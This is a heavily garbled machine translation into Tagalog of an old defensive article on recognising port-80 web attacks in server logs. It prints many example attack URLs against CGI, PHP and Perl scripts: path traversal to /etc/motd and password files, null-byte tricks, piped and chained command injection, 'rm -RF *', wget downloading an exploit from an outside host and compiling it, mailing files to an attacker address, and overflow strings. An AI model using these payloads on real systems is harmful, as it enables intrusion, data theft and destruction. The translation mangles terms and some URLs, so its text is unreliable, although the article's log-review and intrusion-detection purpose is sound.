I. Buod
II. Ang isang detalyadong paglalarawan ng
III. Karagdagang
IV. Spillover Pagtatasa
V. Transcoding
VI. Paghihinuha
[Abstract]
Ang default na web site port 80 upang magsilbi sa iba't-ibang mga problema sa seguridad ay patuloy na release ang mga ito, kahit na ang ilan sa mga kahinaan payagan ang isang magsasalakay upang makakuha ng mga pribilehiyo ng system administrator na ipasok ang mga site mismo, ang mga sumusunod ay Zenomorph port 80-atake sa ilang mga traces pananaliksik, at sabihin sa iyo kung paano mahanap ang mga problema mula sa mga talaan na mag-log.
[Detalye]
Dito sa bahagi sa pamamagitan ng isang bilang ng mga Liezi ipakita sa mga server ng web at mga aplikasyon sa kanilang mga pangkalahatang atake, at traces nito, na kumakatawan lamang Liezi pangunahing atake, at lahat ng uri ng atake ay hindi nakalista, ito ay bahagi detalyadong paglalarawan ng mga papel na ginagampanan ng bawat atake, at kung paano nito upang pagsamantalahan ang mga kahinaan sa atake.
(1) "." ".." At "..." kahilingan
Traces ng mga atake ay napaka-pangkaraniwan para sa mga aplikasyon ng web at web server, na ginagamit upang payagan ang isang magsasalakay o worm-virus program upang baguhin ang landas ng web server, upang makakuha ng access sa mga lugar na sarado. Karamihan sa mga CGI programa na may mga flaws, ".." kahilingan.
Halimbawa:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Ito ay nagpapakita ng magsasalakay kahilingan Liezi mosd ang file na ito, kung ang magsasalakay ang kakayahan ng pambihirang tagumpay ng web server root directory, pagkatapos ay makakuha ng karagdagang impormasyon at upang makakuha ng karagdagang mga pribilehiyo.
(2) "20%" kahilingan
20% ay ang hex halaga na ang 16 mga puwang, bagaman ito ay hindi nangangahulugan na maaari mong gamitin ang anumang bagay, ngunit kapag kayo na makita ang log ay mahanap ito, ang ilang mga web application server na tumatakbo sa ito na karakter ay maaaring epektibong ipinatupad Samakatuwid, dapat kang maingat na suriin muli ang mga mag-log. Sa kabilang dako, ang kahilingan ay maaaring paminsan-minsan ng tulong upang maisagawa ang ilang mga utos.
Halimbawa:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Ito ay nagpapakita Liezi magsasalakay upang magsagawa ng isang Unix command, listahan ang buong katalogo ng mga dokumento hiniling, nagiging sanhi ng magsasalakay upang ma-access ang mga mahahalagang mga file sa iyong sistema, upang makatulong sa kanya upang magbigay ng karagdagang ang mga kondisyon para sa pagkuha ng mga pribilehiyo.
(3) "% 00" kahilingan
00% said ang 16-byte hexadecimal walang laman, siya ay makakapag-tanga ang mga web application, at humiling ng iba't ibang uri ng mga file.
Mga halimbawa:
http://host/cgi-bin/lame.cgi?page=index.html
Ito ay maaaring isang may-bisang kahilingan sa makina, kung ang isang magsasalakay alam ang kahilingan na ito ay matagumpay, siya ay higit pang hanapin ang mga pamamaraan ng cgi.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Marahil na ang cgi programa ay hindi tanggapin ang kahilingan na ito sapagkat ito ay ang kahilingan na i-check ang file hulapi pangalan, tulad ng: html.shtml o iba pang mga uri ng file. Karamihan sa programa ay magsasabi sa iyo ang hiniling na uri ng file ay hindi wasto, oras na ito ito ay sabihin ang magsasalakay sa kahilingan ng mga file ay dapat na isang hulapi ng isang uri ng character file, magsasalakay maaaring makakuha ng landas ang sistema, ang pangalan ng file, na nagreresulta sa ang iyong system na mas sensitibong impormasyon
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Attention sa hiling na ito, ito ay manunuba cgi programa na dokumento na ito ay upang matukoy ang katanggap-tanggap na mga uri ng file, ang ilang mga aplikasyon ng epektibong inspections bilang boba kahilingan file, na kung saan ay karaniwang ginagamit paraan ng magsasalakay.
(4) "|" kahilingan
Ito ay isang pipe karakter, sa Unix na sistema, ang isang kahilingan para sa tulong sa pagpapatupad ng ilang mga utos na sistema at sa parehong oras.
Halimbawa:
# Cat access_log | grep-i ".."
(Utos na ito ay ipinapakita ang mga mag-log in ang "kahilingan ..", karaniwang ginagamit sa pag-atake at bulate natagpuan)
Kadalasan mahanap na maraming mga web application gamitin ang karakter, ito rin ay humantong sa mga maling alarma sa mga ID ng logs.
Sa maingat na pagsusuri ng iyong aplikasyon, upang ang bentahe ng pagbabawas ng mga maling alarma sa mga sistema ng panghihimasok tiktik.
Narito ang ilan sa Lieh-Tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Ang kahilingan command, ang mga sumusunod ay ilang mga pagbabago sa Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
kahilingan na ito ay nakalista sa sistema Unix / etc directory ng lahat ng mga file
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-ako 20% "pilay"
Ang cat command pagpapatupad kahilingan at ang pagpapatupad ng grep utos ay din, tingnan ang "pilay"
(5) ";" kahilingan
Sa Unix systems, karakter na ito ay nagpapahintulot sa maramihang mga command na linya ng pagpapatupad
Halimbawa:
# Id; uname-a
(Pagpapatupad ng id utos, sumunod sa pamamagitan ng pagpapatupad ng mga utos uname)
Ang ilang programa sa web na ito na may character, maaaring magresulta sa iyong mga ID ng logs ng isang babala ng kabiguan, kailangan mong maingat na suriin ang iyong mga web programa, kaya mong mabawasan ang panganib ng kabiguan ng mga ID ng mga alerto.
(6) " " at " " Kahilingan
Dapat suriin ang iyong mga logs rekord ang dalawang karakter, ang isang bilang ng mga dahilan, ang unang isa ay ang karakter na idinagdag ang data sa mga dokumento
Halimbawa 1:
# Echo "ang inyong hax0red h0 h0" / etc / motd (motd kahilingan nakasulat na impormasyon sa dokumentong ito)
Ang magsasalakay ay madaling gamitin ang mga kahilingan tulad ng nasa itaas pakikialam sa iyong web page. Tulad ng mga bantog na RDS maningning na tagumpay ang magsasalakay ay madalas na ginagamit upang palitan ang mga pahina ng web.
Halimbawa 2:
http://host/something.php=Hi 20mom%%% 20Im 20Bold!
Html na mapapansin mo na ang wika ng mga palatandaan dito, siya din ang ginugol character " "," ", tulad-atake ay hindi maaaring maging sanhi ng magsasalakay upang ma-access ang sistema, ito nalilito mga tao isipin ito ay isang lehitimong web site na impormasyon (humahantong sa People bisitahin ang link na ito upang bisitahin ang magsasalakay upang itakda ang address, ang hiling na ito ay maaaring naka-encode sa 16 na mga character hex sa anyo, kaya hindi halata palatandaan ng atake)
(7) "!" Kahilingan
Mga karaniwang wika sa karakter kahilingan SS (Server Side Isama) na atake ko, ang magsasalakay nalilito kung ang user ay nag-click ang isang magsasalakay upang itakda ang koneksyon, at ang parehong bilang sa itaas.
Halimbawa:
http://host1/something.php =
Ang Tzu Lieh-ay ang magsasalakay ay maaaring gawin ito sa isang file sa site host2 mula host1 ay lilitaw sa itaas (ng mga kurso, ay nangangailangan ng mga bisita upang bisitahin ang mga setting ng koneksyon ang magsasalakay's. Kahilingan na ito ay maaaring convert sa 16 hex encoding mask, hindi madaling natagpuan)
Sa parehong oras, lumapit ito ay maaari ding magsagawa ng command kapangyarihan ng web site
Halimbawa:
http://host/something.php =
Ang Lieh-tumakbo sa remote system "id" utos, ito ay ipinapakita id ang gumagamit ng web site, ay karaniwang "walang tao" o "www"
Ang form na ito ay nagbibigay-daan din ang mga kasama nakatagong mga file.
Halimbawa:
http://host/something.php =
Ang mga nakatagong mga file. Htpasswd ay hindi ipapakita, Apache ay tumangging magtatag ng tulad sa mga tuntunin. HT ang request form, at SSI logo ay tulad-bypass ang mga paghihigpit, at humantong sa mga problema sa seguridad
(8) "," Kahilingan
Ang ganitong mga pag-atake na ginamit upang pagtatangka na malayo magsingit ng isang aplikasyon PHP web pamamaraan, ito ay maaring payagan ang pagpapatupad order, depende sa server settings, at iba pang mga kadahilanan sa trabaho (tulad ng php ay naka-set sa ligtas na mode)
Halimbawa: http://host/something.php passthru = ("id ");?
Sa ilang simpleng mga aplikasyon php, maaaring ito ay sa mga web site sa remote karapatan ng sistema ng gumagamit upang maisagawa ang mga lokal na utos
(9) "` "kahilingan
karakter na ito mamaya ginagamit upang execute command sa Perl, ang mga character sa aplikasyon ng web ay hindi kadalasang ginagamit, kaya kung makita mo ito sa iyong log, ay dapat na tunay maingat
Halimbawa:
http://host/something.cgi = `id`
Sumulat ng isang Perl cgi programa sa tanong ay humantong sa pagpapatupad ng id utos
[Karagdagang]
Ang sumusunod na seksyon ay talakayin higit pa sa mga magsasalakay ay maaaring gawin ang utos, kasama ang anumang mga dokumento hiniling, at kung ikaw ay may remote pagpapatupad utos ng Quexian, kung paano i-tsek ang dapat hanapin ito. bahagi na ito ay lamang na magbigay sa iyo ng isang magandang ideya, at sabihin sa inyong sistema kung ano ang nangyayari, subukan attackers na atake ang iyong traces sistema, ngunit ay hindi listahan ng lahat ng mga magsasalakay upang gamitin ang mga utos at ang kahilingan.
"/ Bin / ls"
Ang utos kahilingan ang buong landas, sa maraming mga aplikasyon ng web na ito ay may lusot, kung mag-log ka sa maraming mga lugar tulad ng isang kahilingan, ito ay posible para sa mga malalaking remote pagpapatupad kahinaan utos, ngunit hindi kinakailangan ng isang problema ay maaari ring maging isang maling alarma. Kapag muli reminded, web application na nakasulat na (cgi, asp, php etc ...) ay ang batayan ng seguridad
Halimbawa:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Ito ay isang bintana ng shell, kung ang isang magsasalakay upang ma-access at patakbuhin ang script sa mga setting ng server sa ilalim ng mga kondisyon pinapayagan sa mga bintana ng makina ay maaaring gawin, ang isang pulutong ng mga bulate ay sa pamamagitan ng port 80, na komunikasyon sa remote machine
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Ito ay isang dalawang binary file, ang mga problema at / bin / ls, mo, kung mag-log ka sa maraming mga lugar tulad ng isang kahilingan, ito ay posible para sa mga malalaking remote pagpapatupad kahinaan utos, ngunit hindi kinakailangan ng isang problema ay maaari ring maging isang maling alarma.
Ito ay nagpapakita na bahagi ay pag-aari na kung saan ang gumagamit at grupo
Halimbawa:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
utos na ito ay maaaring tanggalin ang mga file nang hindi ang tamang gamitin ay lubhang mapanganib
Mga halimbawa:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-RF 20% * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-RF 20% *;
"Wget at tftp" command
Ang mga utos ay madalas ang magsasalakay ay maaaring makakuha ng karagdagang mga pribilehiyo upang i-download ang mga file, wget ay isang Unix command sa ilalim, maaaring gamitin para i-download ang backdoors, tftp ay sa ilalim ng Unix at NT upang i-download ang file. Ang ilang mga IIS bulate kumalat ang kanilang mga sarili sa pamamagitan ng tftp upang kopyahin ang mga virus sa iba pang mga nagho-host
Mga halimbawa:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// host / cgi-bin / bad.cgi? DOH wget =% 20http: / / www.hwa-security.net/Phantasmp.c;
"Cat" command
utos na ito ay ginagamit upang tingnan ang mga nilalaman ng file, na ginagamit upang basahin ang mga mahalagang impormasyon, tulad ng mga file na pagsasaayos, password file, credit mga file at mga dokumento na maaari mong isipin ng
Mga halimbawa: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? DOH = cat 20/etc/motd%;
"Echo" command
utos na ito ay ginagamit upang isulat ang data sa mga file, tulad ng "index.html"
Mga halimbawa: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-kiwis #%% 20was 20here"% 20 % 200day.txt | http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-kiwis #%% 20was 20here"% 20 200day.txt%;
"PS" command
Inililista ang mga kasalukuyang tumatakbo proseso, sabihin ang magsasalakay na ang isang remote host ang pagpapatakbo ng software upang makakuha ng ilang mga ideya ng mga isyu ng seguridad, upang makuha ang pahintulot ng karagdagang
Mga halimbawa: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? DOH PS =% 20-aux;
"Pumatay at killall" command
Unix sistema upang patayin ang proseso na ito, ang isang magsasalakay ay maaaring gumamit ng command na ito upang ihinto ang mga serbisyo ng sistema at proseso ay maaari ring burahin ang traces ng magsasalakay, ang ilang mga maningning na tagumpay ay makabuo ng isang pulutong ng mga proseso ng bata
Mga halimbawa: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" command
utos na ito ay nagsasabi sa ang magsasalakay ang pangalan ng remote machine's, sa ilang oras, sa pamamagitan ng web site na ito upang malaman kung aling ISP, isang magsasalakay na maaaring bumisita sa araw na ito. Uname-isang kahilingan sa normal, ang mga ito ay maitatala sa ang mag-log file
Mga halimbawa: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. cgi? DOH uname =% 20-a;
"Cc, gcc, Perl, sawa, etc ..." compilation / interpretasyon ng utos
Magsasalakay sa pamamagitan wget o tftp download maningning na tagumpay, at gamitin ang cc, gcc tagatala sa itala ito sa isang maisasagawang programa, at higit pang-access ang mga pribilehiyo ng
Mga halimbawa: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? DOH = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
Kung tingnan mo ang mga logs na natagpuan sa "Perl" sawa "Ang mga tagubilin ay maaaring maging isang remote magsasalakay upang i-download Perl, sawa script, at tried sa kumuha ang mga pribilehiyo ng mga lokal na
"Mail" command
Attackers madalas gamitin ang command na sistema, ang ilang mahalagang mga dokumento sa sariling mga mailbox ng magsasalakay's, ngunit din handa sa e-mail bomba-atake ay natupad
Mga halimbawa: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ..." at iba pang mga utos
Unix sistema upang payagan ang mga ito upang baguhin ang file permissions
chown = nagbibigay-daan sa setting ng file may-ari chmod = ay nagbibigay-daan upang itakda ang file permissions chgrp = nagbibigay-daan sa ang may-ari upang baguhin ang mga pahintulot ng grupo sa mga file chsh = pinapayagang magbago ng shell ng gumagamit
Mga halimbawa: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? DOH = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" file
Ito ang password sa file system, kadalasang lilim off, at hindi payagan ang upang makita ang mga naka-encrypt password, ngunit para sa isang magsasalakay na maaaring malaman kung ano ang wastong user, at absolute path ng sistema, ang site na pangalan at iba pang impormasyon, bilang ay karaniwang sa pamamagitan ng lilim off, kaya ang magsasalakay ay karaniwang makita / etc / lilim ng file
"/ Etc / master.passwd"
Ang file na ito ay ang password na file BSD sistema, ay naglalaman ng mga naka-encrypt password, ang mga file sa root account ay lamang read-lamang, at ang ilang mga baguhan attackers binuksan ang kanyang mga pagtatangka na basahin ang mga nilalaman sa loob., Kung ang mga web site ay ugat pribilehiyo na tumakbo, at pagkatapos ay ang magsasalakay ay, maaari naming basahin ang mga nilalaman sa loob, ang isang pulutong ng mga problema sa sistema ng administrator ay dumating isa-isa
"/ Etc / maliliman"
Naglalaman ng isang naka-encrypt password system, basahin ang parehong sa root account, at / et / master.passwd halos
"/ Etc / motd"
Kapag ang mga user mag-log sa ang Unix na sistema, ang impormasyon ay lilitaw, sa ang "Mensahe ng Araw" file, ito ay nagbibigay ng mahalagang impormasyon na sistema at ng administrator ang mga gumagamit ng ilang set, ang mga gumagamit na gustong makita ang mga taong hindi, naglalaman din ng sistema ng impormasyon na bersyon, ang magsasalakay ay karaniwang makita ang file na ito, na maunawaan kung ano ang sistema ay tumatakbo sa ang magsasalakay, ang susunod na hakbang ay ang paghahanap para sa ganitong uri ng sistema, maningning na tagumpay, at higit pang-access sa sistema ng mga pribilehiyo ng
"/ Etc / nagho-host"
Ang dokumento ay nagbibigay ng ip address at network ng impormasyon, ang isang magsasalakay ay maaaring malaman ang higit pa tungkol sa mga setting ng network ang system
"/ Usr / local / Apache / Conf / httpd.conf"
Ito ay isang Apache server ng file sa web configuration, isang magsasalakay maaaring maunawaan, tulad ng cgi, SSI at iba pang impormasyon ay mapupuntahan
"/ Etc / inetd.conf"
Ito ay ang configuration file inetd serbisyo, ang isang magsasalakay ay maaaring malaman ang remote machine, simulan ang mga serbisyo, kung gamitin ang pambalot na ma-access control, kung ang balutan ay natagpuan tumatakbo, isang magsasalakay ang susunod na hakbang ay ang "/ etc / hosts.allow" at "/ etc / hosts.deny", file, at na maaaring baguhin ang ilang mga setting, ma-access ang mga pribilehiyo ng
". Htpasswd,. Htaccess, at. Htgroup"
Mga file na ito ay karaniwang ginagamit sa mga web site authentication user, ang isang magsasalakay ay tingnan ang mga file na ito, at makakuha ng user name at password, ang password na file. Htpasswd ay naka-encrypt, break sa pamamagitan ng ilang simpleng proseso decryption, payagan ang isang magsasalakay upang ma-access ang mga site protektado ng mga lugar (karaniwan ay ang user na may parehong pangalan ng user at password, ang magsasalakay ay maaaring kahit na bisitahin ang iba pang mga account)
"Access_log at error_log"
Ang mga ito ay ang Apache server log file, attackers madalas na makita ang mga file na ito, tingnan ang mga kahilingan ay naitala, ang mga at iba pang kahilingan para sa iba't ibang lugar
Kadalasan, ang magsasalakay ay baguhin ang mga file na ito mag-log, tulad ng kanyang sariling mga address na impormasyon, ang magsasalakay sa pamamagitan ng port 80 sa pamamagitan ng iyong system at ang iyong backup na sistema rin ay hindi gumagana, walang iba pang mga programa record record sistema kalagayan, na nais panghihimasok tiktik ay nagiging mahirap na trabaho
"[Drive-sulat]: winntrepairsam._ o [drive-sulat]: winntrepairsam"
Windows NT sistema password file, kung ang remote command ay hindi maaaring ipatupad, attackers ay karaniwang kahilingan ang mga dokumentong ito, pagkatapos ay "l0pht pumutok" ng mga uri ng password cracking tools sa pumutok, kung ang magsasalakay sumusubok sa atake password file tagapangasiwa, kung matagumpay na pagkatapos ay ang remote machine ay ang magsasalakay ay makakakuha ng kontrol
[Overflow analysis]
Sa artikulong ito Hindi ko sabihin ay masyadong marami ang tungkol sa pag-apaw ng mga paksa, ako ay magbibigay sa kung ano ang mga phenomena at traces ng kapansin-pansin at ng mga partikular na pag-aalala, madalas magsasalakay transcoding buffer Gongji at iba pang mga paraan upang makamit ang madaling hanapin
Ito ay isang simpleng Lie Zi
Halimbawa: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Ito Liezi nagpapakita ng magsasalakay sa isang application na magpadala ng isang pulutong ng isang karakter, na subukan sa programa ng isang buffer overflow, buffer overflow maaaring makakuha ng isang remote command permissions pagpapatupad host, kung ang may-ari ay ang setuid at pamamaraan para sa mga ugat, sa pamamagitan ng pag-apaw, maaaring makakuha ng access sa buong sistema, kung hindi mo setuid programa, pagkatapos ay ang pag-apaw ay lamang sa pamamagitan ng pagpapatakbo ng mga karapatan ng user ng web site
Ito ay hindi maaaring sabihin sa lahat ng mga pangyayari, ngunit dapat mong regular na suriin ang iyong mga mag-log file, kung ang araw na bigla na natagpuan ng isang pulutong ng mga kahilingan, ngunit kadalasan ay hindi hihigit sa ang kahilingan, ito ay nangangahulugan na ikaw ay subjected sa atake ng overflow, siyempre, ay maaari ring Ang isang bagong network worm atake
[Transcoding]
Lahat ng mga atake ng nabanggit sa itaas kahilingan, magsasalakay ang karaniwang alam ng sistema ng mga ID ng makinarya ay laging tseke mga kahilingan na ito, karaniwang ang magsasalakay ay gagamit ng data ng conversion kasangkapan sa convert ang hiniling na format nilalaman ng 16 hex, pangunahing mga ID ay huwag pansinin ang mga kahilingan na ito, Kami ay pamilyar sa mga CGI kahinaan-scan na kasangkapan ay isang magandang Liezi bigote. Kung tingnan mo ang log ng mga oras na natagpuan ang isang malaking bilang ng mga 16-band at hindi ang ilang mga karaniwang mga karakter, at pagkatapos ay ang magsasalakay ay maaaring subukan na gumamit ng ilang mga paraan upang atake sa iyong system
Ang mabilis na paraan upang mahanap na ang iyong mag-log file ng isang kahilingan na 16 hex, kopyahin ito sa iyong browser, ang browser ay maaaring transformed sa pamamagitan ng tamang kahilingan, at ipapakita ang mga nilalaman ng kahilingan, kung hindi mo tapang na kumuha ng panganib na ito, isang simpleng tao Ascii, ay maaaring magbigay sa iyo ang tamang code.
[Paghihinuha]
artikulo na ito ay hindi sumasakop sa lahat ng 80 "ports" na ng mga atake, ngunit karamihan ay nabanggit ng higit sa pangkalahatang pag-atake, at sabihin sa iyo kung paano upang suriin ang iyong mga file na mag-log, at kung paano magdagdag ng tulad ng bilang ng mga ID ng mga patakaran, pagsulat ang kanyang layunin ay upang web system administrator ay dapat na nababahala tungkol sa kung ano ang isang magandang ideya sa parehong oras, Umaasa ako artikulong ito ay tumutulong sa mga web developer na programa sa web na sumulat ng mas mahusay programa
NG NOTE: Kung mayroon kang anumang mga puna at mungkahi, mangyaring magpadala ng isang e-mail admin@cgisecurity.com.